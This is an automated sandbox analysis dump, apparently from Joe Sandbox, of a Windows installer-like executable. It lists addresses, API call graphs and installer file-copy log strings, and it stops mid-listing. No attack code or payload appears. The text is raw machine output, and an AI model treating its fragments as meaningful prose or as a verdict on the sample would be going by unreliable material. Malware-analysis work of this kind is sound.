51810 42c99c CharNextA 51808->51810 51999 47efd0 56 API calls 51809->51999 51812 46c84e 51810->51812 51812->51791 52000 466a94 18 API calls 51812->52000 51814 46c865 51815 451458 18 API calls 51814->51815 51816 46c872 51815->51816 52001 47efd0 56 API calls 51816->52001 51819 4241ed SetActiveWindow 51818->51819 51823 424223 51818->51823 52002 42364c 51819->52002 51823->50645 51823->50646 51824 42420a 51824->51823 51825 42421d SetFocus 51824->51825 51825->51823 51827 482505 51826->51827 51828 4824d7 51826->51828 51830 475bd0 51827->51830 52021 494cec 32 API calls 51828->52021 52022 457d10 51830->52022 51834 475c26 51989->50641 51996->51797 51997->51791 51998->51791 51999->51791 52000->51814 52001->51791 52016 4235f8 SystemParametersInfoA 52002->52016 52005 423665 ShowWindow 52007 423670 52005->52007 52008 423677 52005->52008 52019 423628 SystemParametersInfoA 52007->52019 52010 423b14 52008->52010 52011 423b62 52010->52011 52013 423b23 52010->52013 52011->51824 52012 423b5a 52020 40b1d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52012->52020 52013->52011 52013->52012 52015 423b4e SetWindowPos 52013->52015 52015->52012 52015->52013 52017 423616 52016->52017 52017->52005 52018 423628 SystemParametersInfoA 52017->52018 52018->52005 52019->52008 52020->52011 52021->51827 52023 457d3c 52022->52023 52038 457e44 52022->52038 52494 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52023->52494 52024 457e95 52027 403400 4 API calls 52024->52027 52029 457eaa 52027->52029 52028 457d44 52030 4078f4 33 API calls 52028->52030 52043 4072a8 52029->52043 52031 457db5 52030->52031 52495 457d00 34 API calls 52031->52495 52033 403778 18 API calls 52037 457dbd 52033->52037 52034 457e0b 52037->52033 52037->52034 52039 457d00 34 API calls 52037->52039 52038->52024 52498 45757c 20 API calls 52038->52498 52039->52037 52044 403738 52043->52044 52045 4072b2 SetCurrentDirectoryA 52044->52045 52045->51834 52494->52028 52495->52037 52498->52024 53705 431eec 53666->53705 53668 403400 4 API calls 53669 43da76 53668->53669 53669->50702 53669->50703 53670 43d9f2 53670->53668 53672 431bd6 53671->53672 53673 402648 18 API calls 53672->53673 53674 431c06 53673->53674 53675 4947f8 53674->53675 53676 4948cd 53675->53676 53680 494812 53675->53680 53682 494910 53676->53682 53678 433d6c 18 API calls 53678->53680 53680->53676 53680->53678 53681 403450 18 API calls 53680->53681 53710 408c0c 18 API calls 53680->53710 53711 431ca0 53680->53711 53681->53680 53683 49492c 53682->53683 53719 433d6c 53683->53719 53685 494931 53686 431ca0 18 API calls 53685->53686 53687 49493c 53686->53687 53688 43d594 53687->53688 53689 43d5c1 53688->53689 53694 43d5b3 53688->53694 53689->50713 53690 43d63d 53696 43d6f7 53690->53696 53722 447084 53690->53722 53692 43d688 53728 43dd50 53692->53728 53694->53689 53694->53690 53695 447084 18 API calls 53694->53695 53695->53694 53697 43d8fd 53696->53697 53699 43d8de 53696->53699 53746 447024 18 API calls 53696->53746 53697->53689 53748 447024 18 API calls 53697->53748 53747 447024 18 API calls 53699->53747 53702->50715 53703->50717 53704->50704 53706 403494 4 API calls 53705->53706 53708 431efb 53706->53708 53707 431f25 53707->53670 53708->53707 53709 403744 18 API calls 53708->53709 53709->53708 53710->53680 53712 431cc0 53711->53712 53713 431cae 53711->53713 53714 431ce2 53712->53714 53718 431c40 18 API calls 53712->53718 53717 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53713->53717 53714->53680 53717->53712 53718->53714 53720 402648 18 API calls 53719->53720 53721 433d7b 53720->53721 53721->53685 53723 4470a3 53722->53723 53724 4470aa 53722->53724 53749 446e30 18 API calls 53723->53749 53726 431ca0 18 API calls 53724->53726 53727 4470ba 53726->53727 53727->53692 53729 43dd6c 53728->53729 53735 43dd99 53728->53735 53730 402660 4 API calls 53729->53730 53729->53735 53730->53729 53731 43ddce 53731->53696 53733 43fea5 53733->53731 53754 447024 18 API calls 53733->53754 53734 43c938 18 API calls 53734->53735 53735->53731 53735->53733 53735->53734 53740 433d18 18 API calls 53735->53740 53741 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53735->53741 53742 436650 18 API calls 53735->53742 53743 431c40 18 API calls 53735->53743 53744 446e30 18 API calls 53735->53744 53745 447024 18 API calls 53735->53745 53750 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53735->53750 53751 4396e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53735->53751 53752 43dc48 32 API calls 53735->53752 53753 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53735->53753 53740->53735 53741->53735 53742->53735 53743->53735 53744->53735 53745->53735 53746->53696 53747->53697 53748->53697 53749->53724 53750->53735 53751->53735 53752->53735 53753->53735 53754->53733 53756 41fb58 53757 41fb61 53756->53757 53760 41fdfc 53757->53760 53759 41fb6e 53761 41feee 53760->53761 53762 41fe13 53760->53762 53761->53759 53762->53761 53781 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53762->53781 53764 41fe49 53765 41fe73 53764->53765 53766 41fe4d 53764->53766 53791 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53765->53791 53782 41fb9c 53766->53782 53770 41fe81 53772 41fe85 53770->53772 53773 41feab 53770->53773 53771 41fb9c 10 API calls 53775 41fe71 53771->53775 53776 41fb9c 10 API calls 53772->53776 53774 41fb9c 10 API calls 53773->53774 53777 41febd 53774->53777 53775->53759 53778 41fe97 53776->53778 53780 41fb9c 10 API calls 53777->53780 53779 41fb9c 10 API calls 53778->53779 53779->53775 53780->53775 53781->53764 53783 41fbb7 53782->53783 53784 41f93c 4 API calls 53783->53784 53785 41fbcd 53783->53785 53784->53785 53792 41f93c 53785->53792 53787 41fc15 53788 41fc38 SetScrollInfo 53787->53788 53800 41fa9c 53788->53800 53791->53770 53793 4181e0 53792->53793 53794 41f959 GetWindowLongA 53793->53794 53795 41f996 53794->53795 53796 41f976 53794->53796 53812 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53795->53812 53811 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53796->53811 53799 41f982 53799->53787 53801 41faaa 53800->53801 53802 41fab2 53800->53802 53801->53771 53803 41faf1 53802->53803 53804 41fae1 53802->53804 53808 41faef 53802->53808 53814 417e48 IsWindowVisible ScrollWindow SetWindowPos 53803->53814 53813 417e48 IsWindowVisible ScrollWindow SetWindowPos 53804->53813 53805 41fb31 GetScrollPos 53805->53801 53809 41fb3c 53805->53809 53808->53805 53810 41fb4b SetScrollPos 53809->53810 53810->53801 53811->53799 53812->53799 53813->53808 53814->53808 53815 420598 53816 4205ab 53815->53816 53836 415b30 53816->53836 53818 4206f2 53819 420709 53818->53819 53843 4146d4 KiUserCallbackDispatcher 53818->53843 53823 420720 53819->53823 53844 414718 KiUserCallbackDispatcher 53819->53844 53820 420651 53841 420848 34 API calls 53820->53841 53821 4205e6 53821->53818 53821->53820 53829 420642 MulDiv 53821->53829 53826 420742 53823->53826 53845 420060 12 API calls 53823->53845 53827 42066a 53827->53818 53842 420060 12 API calls 53827->53842 53840 41a304 19 API calls 53829->53840 53832 420687 53833 4206a3 MulDiv 53832->53833 53834 4206c6 53832->53834 53833->53834 53834->53818 53835 4206cf MulDiv 53834->53835 53835->53818 53837 415b42 53836->53837 53846 414470 53837->53846 53839 415b5a 53839->53821 53840->53820 53841->53827 53842->53832 53843->53819 53844->53823 53845->53826 53847 41448a 53846->53847 53850 410458 53847->53850 53849 4144a0 53849->53839 53853 40dca4 53850->53853 53852 41045e 53852->53849 53854 40dd06 53853->53854 53855 40dcb7 53853->53855 53860 40dd14 53854->53860 53858 40dd14 33 API calls 53855->53858 53859 40dce1 53858->53859 53859->53852 53861 40dd24 53860->53861 53863 40dd3a 53861->53863 53872 40e09c 53861->53872 53888 40d5e0 53861->53888 53891 40df4c 53863->53891 53866 40d5e0 19 API calls 53867 40dd42 53866->53867 53867->53866 53868 40ddae 53867->53868 53894 40db60 53867->53894 53870 40df4c 19 API calls 53868->53870 53871 40dd10 53870->53871 53871->53852 53908 40e96c 53872->53908 53874 403778 18 API calls 53876 40e0d7 53874->53876 53875 40e18d 53877 40e1b7 53875->53877 53878 40e1a8 53875->53878 53876->53874 53876->53875 53971 40d774 19 API calls 53876->53971 53972 40e080 19 API calls 53876->53972 53968 40ba24 53877->53968 53917 40e3c0 53878->53917 53884 40e1b5 53885 403400 4 API calls 53884->53885 53886 40e25c 53885->53886 53886->53861 53889 40ea08 19 API calls 53888->53889 53890 40d5ea 53889->53890 53890->53861 54005 40d4bc 53891->54005 54014 40df54 53894->54014 53897 40e96c 19 API calls 53898 40db9e 53897->53898 53899 40e96c 19 API calls 53898->53899 53900 40dba9 53899->53900 53901 40dbc4 53900->53901 53902 40dbbb 53900->53902 53907 40dbc1 53900->53907 54021 40d9d8 53901->54021 54024 40dac8 33 API calls 53902->54024 53905 403420 4 API calls 53906 40dc8f 53905->53906 53906->53867 53907->53905 53974 40d780 53908->53974 53911 4034e0 18 API calls 53912 40e98f 53911->53912 53913 403744 18 API calls 53912->53913 53914 40e996 53913->53914 53915 40d780 19 API calls 53914->53915 53916 40e9a4 53915->53916 53916->53876 53918 40e3ec 53917->53918 53920 40e3f6 53917->53920 53979 40d440 19 API calls 53918->53979 53921 40e511 53920->53921 53922 40e495 53920->53922 53923 40e4f6 53920->53923 53924 40e576 53920->53924 53925 40e438 53920->53925 53926 40e4d9 53920->53926 53927 40e47a 53920->53927 53928 40e4bb 53920->53928 53939 40e45c 53920->53939 53931 40d764 19 API calls 53921->53931 53987 40de24 19 API calls 53922->53987 53992 40e890 19 API calls 53923->53992 53935 40d764 19 API calls 53924->53935 53980 40d764 53925->53980 53990 40e9a8 19 API calls 53926->53990 53986 40d818 19 API calls 53927->53986 53989 40dde4 19 API calls 53928->53989 53940 40e519 53931->53940 53934 403400 4 API calls 53941 40e5eb 53934->53941 53942 40e57e 53935->53942 53938 40e4a0 53988 40d470 19 API calls 53938->53988 53939->53934 53948 40e523 53940->53948 53949 40e51d 53940->53949 53941->53884 53950 40e582 53942->53950 53951 40e59b 53942->53951 53943 40e4e4 53991 409d38 18 API calls 53943->53991 53945 40e461 53985 40ded8 19 API calls 53945->53985 53946 40e444 53983 40de24 19 API calls 53946->53983 53993 40ea08 53948->53993 53956 40e521 53949->53956 53957 40e53c 53949->53957 53959 40ea08 19 API calls 53950->53959 53999 40de24 19 API calls 53951->53999 53997 40de24 19 API calls 53956->53997 53960 40ea08 19 API calls 53957->53960 53959->53939 53962 40e544 53960->53962 53961 40e44f 53984 40e26c 19 API calls 53961->53984 53996 40d8a0 19 API calls 53962->53996 53965 40e566 53998 40e2d4 18 API calls 53965->53998 54000 40b9d0 53968->54000 53971->53876 53972->53876 53973 40d774 19 API calls 53973->53884 53977 40d78b 53974->53977 53975 40d7c5 53975->53911 53977->53975 53978 40d7cc 19 API calls 53977->53978 53978->53977 53979->53920 53981 40ea08 19 API calls 53980->53981 53982 40d76e 53981->53982 53982->53945 53982->53946 53983->53961 53984->53939 53985->53939 53986->53939 53987->53938 53988->53939 53989->53939 53990->53943 53991->53939 53992->53939 53994 40d780 19 API calls 53993->53994 53995 40ea15 53994->53995 53995->53939 53996->53939 53997->53965 53998->53939 53999->53939 54001 40b9e2 54000->54001 54003 40ba07 54000->54003 54001->54003 54004 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54001->54004 54003->53884 54003->53973 54004->54003 54006 40ea08 19 API calls 54005->54006 54007 40d4c9 54006->54007 54008 40d4dc 54007->54008 54012 40eb0c 19 API calls 54007->54012 54008->53867 54010 40d4d7 54013 40d458 19 API calls 54010->54013 54012->54010 54013->54008 54015 40d764 19 API calls 54014->54015 54016 40df6b 54015->54016 54017 40db93 54016->54017 54018 40ea08 19 API calls 54016->54018 54017->53897 54019 40df78 54018->54019 54019->54017 54025 40ded8 19 API calls 54019->54025 54026 40ab7c 33 API calls 54021->54026 54023 40da00 54023->53907 54024->53907 54025->54017 54026->54023 56223 40ce7c 56224 40ce84 56223->56224 56225 40ceae 56224->56225 56226 40ceb2 56224->56226 56227 40cea7 56224->56227 56229 40ceb6 56226->56229 56230 40cec8 56226->56230 56235 406288 GlobalHandle GlobalUnWire GlobalFree 56227->56235 56236 40625c GlobalAlloc GlobalFix 56229->56236 56237 40626c GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 56230->56237 56233 40cec4 56233->56225 56234 408cbc 19 API calls 56233->56234 56234->56225 56235->56225 56236->56233 56237->56233 56238 41363c SetWindowLongA GetWindowLongA 56239 41367b GetWindowLongA 56238->56239 56241 413699 SetPropA SetPropA 56238->56241 56240 41368a SetWindowLongA 56239->56240 56239->56241 56240->56241 56245 41f39c 56241->56245 56250 415270 56245->56250 56257 423c0c 56245->56257 56351 423a84 56245->56351 56246 4136e9 56251 41527d 56250->56251 56252 4152e3 56251->56252 56253 4152d8 56251->56253 56256 4152e1 56251->56256 56358 424b8c 13 API calls 56252->56358 56253->56256 56359 41505c 60 API calls 56253->56359 56256->56246 56262 423c42 56257->56262 56260 423cec 56265 423cf3 56260->56265 56266 423d27 56260->56266 56261 423c8d 56263 423c93 56261->56263 56264 423d50 56261->56264 56276 423c63 56262->56276 56360 423b68 56262->56360 56268 423cc5 56263->56268 56269 423c98 56263->56269 56272 423d62 56264->56272 56273 423d6b 56264->56273 56267 423cf9 56265->56267 56310 423fb1 56265->56310 56270 423d32 56266->56270 56271 42409a IsIconic 56266->56271 56274 423f13 SendMessageA 56267->56274 56275 423d07 56267->56275 56268->56276 56300 423cde 56268->56300 56301 423e3f 56268->56301 56278 423df6 56269->56278 56279 423c9e 56269->56279 56280 4240d6 56270->56280 56281 423d3b 56270->56281 56271->56276 56277 4240ae GetFocus 56271->56277 56282 423d78 56272->56282 56283 423d69 56272->56283 56367 424194 11 API calls 56273->56367 56274->56276 56275->56276 56302 423cc0 56275->56302 56331 423f56 56275->56331 56276->56246 56277->56276 56288 4240bf 56277->56288 56372 423b84 NtdllDefWindowProc_A 56278->56372 56289 423ca7 56279->56289 56290 423e1e PostMessageA 56279->56290 56379 424850 WinHelpA PostMessageA 56280->56379 56286 4240ed 56281->56286 56281->56302 56287 4241dc 11 API calls 56282->56287 56368 423b84 NtdllDefWindowProc_A 56283->56368 56298 4240f6 56286->56298 56299 42410b 56286->56299 56287->56276 56378 41eff4 GetCurrentThreadId EnumThreadWindows 56288->56378 56295 423cb0 56289->56295 56296 423ea5 56289->56296 56373 423b84 NtdllDefWindowProc_A 56290->56373 56305 423cb9 56295->56305 56306 423dce IsIconic 56295->56306 56307 423eae 56296->56307 56308 423edf 56296->56308 56297 423e39 56297->56276 56309 4244d4 19 API calls 56298->56309 56380 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56299->56380 56300->56302 56311 423e0b 56300->56311 56364 423b84 NtdllDefWindowProc_A 56301->56364 56302->56276 56366 423b84 NtdllDefWindowProc_A 56302->56366 56304 4240c6 56304->56276 56319 4240ce SetFocus 56304->56319 56305->56302 56320 423d91 56305->56320 56313 423dea 56306->56313 56314 423dde 56306->56314 56321 423b14 5 API calls 56307->56321 56365 423b84 NtdllDefWindowProc_A 56308->56365 56309->56276 56310->56276 56328 423fd7 IsWindowEnabled 56310->56328 56317 424178 26 API calls 56311->56317 56371 423b84 NtdllDefWindowProc_A 56313->56371 56370 423bc0 29 API calls 56314->56370 56317->56276 56318 423e45 56325 423e83 56318->56325 56326 423e61 56318->56326 56319->56276 56320->56276 56369 422c4c ShowWindow PostMessageA PostQuitMessage 56320->56369 56327 423eb6 56321->56327 56324 423ee5 56330 423efd 56324->56330 56337 41eea4 2 API calls 56324->56337 56333 423a84 6 API calls 56325->56333 56332 423b14 5 API calls 56326->56332 56335 423ec8 56327->56335 56342 41ef58 6 API calls 56327->56342 56328->56276 56329 423fe5 56328->56329 56343 423fec IsWindowVisible 56329->56343 56338 423a84 6 API calls 56330->56338 56331->56276 56339 423f78 IsWindowEnabled 56331->56339 56340 423e69 PostMessageA 56332->56340 56341 423e8b PostMessageA 56333->56341 56374 423b84 NtdllDefWindowProc_A 56335->56374 56337->56330 56338->56276 56339->56276 56344 423f86 56339->56344 56340->56276 56341->56276 56342->56335 56343->56276 56345 423ffa GetFocus 56343->56345 56375 412310 21 API calls 56344->56375 56347 4181e0 56345->56347 56348 42400f SetFocus 56347->56348 56376 415240 56348->56376 56352 423b0d 56351->56352 56353 423a94 56351->56353 56352->56246 56353->56352 56354 423a9a EnumWindows 56353->56354 56354->56352 56355 423ab6 GetWindow GetWindowLongA 56354->56355 56381 423a1c GetWindow 56354->56381 56356 423ad5 56355->56356 56356->56352 56357 423b01 SetWindowPos 56356->56357 56357->56352 56357->56356 56358->56256 56359->56256 56361 423b72 56360->56361 56362 423b7d 56360->56362 56361->56362 56363 408720 21 API calls 56361->56363 56362->56260 56362->56261 56363->56362 56364->56318 56365->56324 56366->56276 56367->56276 56368->56276 56369->56276 56370->56276 56371->56276 56372->56276 56373->56297 56374->56276 56375->56276 56377 41525b SetFocus 56376->56377 56377->56276 56378->56304 56379->56297 56380->56297 56382 423a3d GetWindowLongA 56381->56382 56383 423a49 56381->56383 56382->56383 56384 4809f7 56385 480a00 56384->56385 56386 480a2b 56384->56386 56385->56386 56387 480a1d 56385->56387 56389 480a6a 56386->56389 56758 47f4a4 18 API calls 56386->56758 56756 476c50 202 API calls 56387->56756 56390 480a8e 56389->56390 56393 480a81 56389->56393 56394 480a83 56389->56394 56396 480aca 56390->56396 56397 480aac 56390->56397 56392 480a5d 56759 47f50c 56 API calls 56392->56759 56401 47f4e8 56 API calls 56393->56401 56760 47f57c 56 API calls 56394->56760 56395 480a22 56395->56386 56757 408be0 19 API calls 56395->56757 56763 47f33c 38 API calls 56396->56763 56402 480ac1 56397->56402 56761 47f50c 56 API calls 56397->56761 56401->56390 56762 47f33c 38 API calls 56402->56762 56406 480ac8 56407 480ada 56406->56407 56408 480ae0 56406->56408 56409 480ade 56407->56409 56412 47f4e8 56 API calls 56407->56412 56408->56409 56410 47f4e8 56 API calls 56408->56410 56510 47c66c 56409->56510 56410->56409 56412->56409 56511 42d898 GetWindowsDirectoryA 56510->56511 56512 47c690 56511->56512 56513 403450 18 API calls 56512->56513 56514 47c69d 56513->56514 56515 42d8c4 GetSystemDirectoryA 56514->56515 56516 47c6a5 56515->56516 56517 403450 18 API calls 56516->56517 56518 47c6b2 56517->56518 56519 42d8f0 6 API calls 56518->56519 56520 47c6ba 56519->56520 56521 403450 18 API calls 56520->56521 56522 47c6c7 56521->56522 56523 47c6d0 56522->56523 56524 47c6ec 56522->56524 56795 42d208 56523->56795 56526 403400 4 API calls 56524->56526 56528 47c6ea 56526->56528 56529 47c731 56528->56529 56531 42c8cc 19 API calls 56528->56531 56775 47c4f4 56529->56775 56530 403450 18 API calls 56530->56528 56533 47c70c 56531->56533 56535 403450 18 API calls 56533->56535 56537 47c719 56535->56537 56536 403450 18 API calls 56538 47c74d 56536->56538 56537->56529 56540 403450 18 API calls 56537->56540 56539 47c76b 56538->56539 56541 4035c0 18 API calls 56538->56541 56542 47c4f4 22 API calls 56539->56542 56540->56529 56541->56539 56543 47c77a 56542->56543 56544 403450 18 API calls 56543->56544 56545 47c787 56544->56545 56546 47c7af 56545->56546 56547 42c3fc 19 API calls 56545->56547 56548 47c816 56546->56548 56551 47c4f4 22 API calls 56546->56551 56549 47c79d 56547->56549 56550 47c8de 56548->56550 56555 47c836 SHGetKnownFolderPath 56548->56555 56554 4035c0 18 API calls 56549->56554 56552 47c8e7 56550->56552 56553 47c908 56550->56553 56556 47c7c7 56551->56556 56554->56546 56559 47c850 56555->56559 56560 47c88b SHGetKnownFolderPath 56555->56560 56561 403450 18 API calls 56556->56561 56560->56550 56756->56395 56758->56392 56759->56389 56760->56390 56761->56402 56762->56406 56763->56406 56776 42de1c RegOpenKeyExA 56775->56776 56777 47c51a 56776->56777 56778 47c540 56777->56778 56779 47c51e 56777->56779 56781 403400 4 API calls 56778->56781 56780 42dd4c 20 API calls 56779->56780 56782 47c52a 56780->56782 56783 47c547 56781->56783 56784 47c535 RegCloseKey 56782->56784 56785 403400 4 API calls 56782->56785 56783->56536 56784->56783 56785->56784 56796 4038a4 18 API calls 56795->56796 56798 42d21b 56796->56798 56797 42d232 GetEnvironmentVariableA 56797->56798 56799 42d23e 56797->56799 56798->56797 56802 42d245 56798->56802 56807 42dbd0 18 API calls 56798->56807 56800 403400 4 API calls 56799->56800 56800->56802 56802->56530 56807->56798

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 004706A8 Relevance: 79.7, APIs: 4, Strings: 41, Instructions: 965COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                                                                                                                                                  • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                                                                                                                                                  • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                                                                                                                                                  • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                                                                                                                                                  • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                                                                                                                                                  • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                                                                                                                                                  • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                                                                                                                                                  • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                                                                                                                                                  • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                                                                                                                                                  • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                                                                                                                                                  • Same version. Skipping., xrefs: 00470CE5
                                                                                                                                                                                                                                  • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                                                                                                                                                  • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                                                                                                                                                  • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                                                                                                                                                  • Version of existing file: (none), xrefs: 00470CFA
                                                                                                                                                                                                                                  • "A4, xrefs: 00470746
                                                                                                                                                                                                                                  • Version of our file: (none), xrefs: 00470AFC
                                                                                                                                                                                                                                  • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                                                                                                                                                  • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                                                                                                                                                  • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                                                                                                                                                  • Will register the file (a type library) later., xrefs: 00471513
                                                                                                                                                                                                                                  • .tmp, xrefs: 00470FB7
                                                                                                                                                                                                                                  • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                                                                                                                                                  • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                                                                                                                                                  • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                                                                                                                                                  • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                                                                                                                                                  • Installing the file., xrefs: 00470F09
                                                                                                                                                                                                                                  • InUn, xrefs: 0047115F
                                                                                                                                                                                                                                  • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                                                                                                                                                  • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                                                                                                                                                  • @, xrefs: 004707B0
                                                                                                                                                                                                                                  • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                                                                                                                                                  • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                                                                                                                                                  • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                                                                                                                                                  • Dest filename: %s, xrefs: 00470894
                                                                                                                                                                                                                                  • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                                                                                                                                                  • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                                                                                                                                                  • -- File entry --, xrefs: 004706FB
                                                                                                                                                                                                                                  • Dest file exists., xrefs: 004709BB
                                                                                                                                                                                                                                  • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                                                                                                                                                  • Installing into GAC, xrefs: 00471714
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $"A4$-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                                                                                                                                                  • API String ID: 0-3008699294
                                                                                                                                                                                                                                  • Opcode ID: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
                                                                                                                                                                                                                                  • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042E09C Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
